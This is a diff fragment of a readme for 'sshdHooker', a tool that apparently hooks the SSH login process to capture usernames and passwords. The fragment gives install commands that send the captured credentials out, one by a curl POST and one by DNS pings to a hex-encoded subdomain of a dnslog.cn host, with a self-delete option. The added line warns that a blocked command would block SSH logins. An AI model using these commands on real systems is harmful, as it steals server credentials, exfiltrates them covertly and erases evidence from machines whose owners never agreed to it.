9bie/sshdHooker/readme.md

 bash install.sh -p "curl -X POST -d 'username=%s\&password=%s' http://127.0.0.1" -m 1
 ```

-dns send password and self-delete
+dns send password and self-delete (Please make sure that your command is not blocked, because the actual use of this program is that the system is an online program, if the command is blocked, it will cause the ssh login program to be blocked)
 ```
 bash install.sh -p 'ping `echo %s-%s|xxd -ps`.k9lovy.dnslog.cn -c 1' -m 1 -d anyone
 ```